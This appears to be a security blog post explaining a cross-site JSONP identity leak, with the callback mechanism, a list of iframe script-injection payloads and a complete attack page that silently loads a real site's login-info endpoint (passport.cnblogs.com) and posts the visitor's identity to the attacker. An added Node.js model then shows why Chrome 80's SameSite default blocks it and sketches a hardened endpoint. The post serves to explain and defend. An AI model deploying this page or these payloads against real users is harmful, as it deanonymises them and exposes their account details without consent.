Social ID tracing

The idea behind social ID tracing is this: an attacker page injects JavaScript through an iframe, and that script dynamically adds a <script> tag whose src points at a JSONP endpoint on a social site. The browser attaches the victim's cookies for that site to the request, so the endpoint answers with the logged-in user's identity and the callback delivers it to the attacker. This no longer works in recent Chrome: since Chrome 80 cookies without a SameSite attribute are treated as SameSite=Lax, so they are not sent on cross-site script loads unless the site explicitly sets SameSite=None; Secure.

The tests here were done on Chrome 75. Before looking at the payload, it helps to understand the JS callback mechanism.

Callback mechanism

The endpoint you call does not return plain JSON; it returns a script body that wraps the data in a call to the callback name you supplied (for example test({...})). The browser executes that script as it would any other, so the callback function is invoked directly with the data.

PAYLOAD

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

Several ways to get script execution from an iframe (IE's vbscript: scheme, javascript: and data: URLs, or an existing reflected XSS on the target):

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  
<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

Consolidated payload

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Jsonp</title>
</head>
<body>
<!-- Jsonp -->

<!-- cnblogs: the iframe's src is a data: URL whose only job is eval(name),
     i.e. run the code stored in the iframe's name attribute (window.name inside the frame) -->
<iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name="
/* JSONP callback: the endpoint responds with test({...}), so this runs with the victim's login info */
window.test = function(data) {
let s = {source: 'cnblogs', d: data};
/* hand the result up to the parent (attacker) page; '*' is acceptable here because the parent is ours */
window.parent.postMessage(s, '*');
}
/* append a script tag pointing at the JSONP endpoint; the browser sends the victim's cnblogs cookies with it */
let s = document.createElement('script');
s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test'
document.documentElement.appendChild(s);
" style="border-width: 0px;"></iframe>

<script>
// receive the leaked login info posted by the iframe
window.addEventListener("message", function(e){
console.log(e.data);
}, false);
</script>

</body>
</html>
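The following is an added example, not code from the original post or from any of the sites it targets. It models in Node.js the three pieces that the callback mechanism and the payload above rely on: a JSONP endpoint that wraps the logged-in identity in a call to the client-supplied callback, the attacker's callback executing that response, and the browser's decision whether the target's cookie is attached to a cross-site script load, which is exactly what changed between Chrome 75 and Chrome 80. A hardened endpoint is included beside the vulnerable one. The host passport.example.com, the endpoint path /user/LoginInfo, the cookie sid=abc123 and the user record are all constructed for illustration.

```javascript
// Added example (not from the original post): a runnable model of the
// JSONP identity leak and of why it stopped working in newer Chrome.
// passport.example.com, /user/LoginInfo, the cookie "sid=abc123" and the
// user record below are constructed for illustration.

// Constructed session store: Cookie header -> logged-in identity.
const SESSIONS = { 'sid=abc123': { userId: 'alice', displayName: 'Alice' } };

// Only plain identifiers are acceptable as a callback name.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*$/;

// Server side, as the page's target behaves: look the caller up by the
// cookie the browser attached and wrap the result in a call to whatever
// callback name the query string supplies. Nothing checks who is asking.
function vulnerableJsonpEndpoint(req) {
  const url = new URL(req.url, 'https://passport.example.com');
  const cb = url.searchParams.get('callback') || 'callback';
  const user = SESSIONS[req.headers.cookie] || null;
  return { status: 200, body: `${cb}(${JSON.stringify(user)})` };
}

// Client side: a <script src=...> does not parse the response, it runs it.
// Binding the callback name as a Function parameter plays the same role as
// the page's `window.test = function(data) {...}` before appending the tag.
function executeJsonp(body, callbackName) {
  let received;
  new Function(callbackName, body)((data) => { received = data; });
  return received;
}

// Browser side: is the target's cookie sent on a cross-site script load?
// Before Chrome 80 a cookie with no SameSite attribute went on every request.
// Chrome 80+ treats it as SameSite=Lax, which excludes cross-site subresource
// loads such as <script src>; only SameSite=None (with Secure) keeps the old
// behaviour. Sites are compared by registrable domain here, simplified to
// an exact string match.
function cookieAttached({ topLevelSite, requestSite, cookieSameSite, laxByDefault }) {
  if (topLevelSite === requestSite) return true;
  const effective = cookieSameSite || (laxByDefault ? 'Lax' : 'None');
  return effective === 'None';
}

// End to end: an attacker page on attackerSite embeds the script tag.
// Returns the identity the attacker learns, or null when nothing leaks.
function simulateLeak({ attackerSite, cookieSameSite = null, laxByDefault, endpoint = vulnerableJsonpEndpoint }) {
  const attached = cookieAttached({ topLevelSite: attackerSite, requestSite: 'example.com', cookieSameSite, laxByDefault });
  const req = {
    url: '/user/LoginInfo?callback=test',
    headers: { cookie: attached ? 'sid=abc123' : '', referer: `https://${attackerSite}/` },
  };
  const res = endpoint(req);
  if (res.status !== 200) return null;
  return executeJsonp(res.body, 'test');
}

// Hardened endpoint: reject callback names that are not identifiers (so the
// endpoint cannot double as a script-injection sink) and refuse to release
// session data to cross-site callers. <script> loads carry no Origin header,
// so Sec-Fetch-Site (Chrome 76+) and Referer are what is available; Referer
// can be stripped by Referrer-Policy, so the robust fix is to stop serving
// private data over JSONP at all and use CORS with credentials instead.
function hardenedJsonpEndpoint(req) {
  const url = new URL(req.url, 'https://passport.example.com');
  const cb = url.searchParams.get('callback') || 'callback';
  if (!CALLBACK_NAME.test(cb)) return { status: 400, body: '' };
  if (req.headers['sec-fetch-site'] === 'cross-site') return { status: 403, body: '' };
  let host = '';
  try { host = new URL(req.headers.referer || '').hostname; } catch (_) { /* missing or malformed Referer */ }
  if (host !== 'example.com' && !host.endsWith('.example.com')) return { status: 403, body: '' };
  const user = SESSIONS[req.headers.cookie] || null;
  return { status: 200, body: `${cb}(${JSON.stringify(user)})` };
}

console.log('Chrome 75 model :', simulateLeak({ attackerSite: 'attacker.test', laxByDefault: false }));
console.log('Chrome 80+ model:', simulateLeak({ attackerSite: 'attacker.test', laxByDefault: true }));
console.log('hardened        :', simulateLeak({ attackerSite: 'attacker.test', laxByDefault: false, endpoint: hardenedJsonpEndpoint }));
```

The first call reproduces the leak the post observed on Chrome 75; the second shows the same payload returning null once the Lax default applies, which is the "no longer works in newer Chrome" caveat; the third shows that a Referer/Sec-Fetch-Site check closes the hole even on an old browser. Note that a SameSite=None cookie on the target side reopens the leak, so the server-side check still matters.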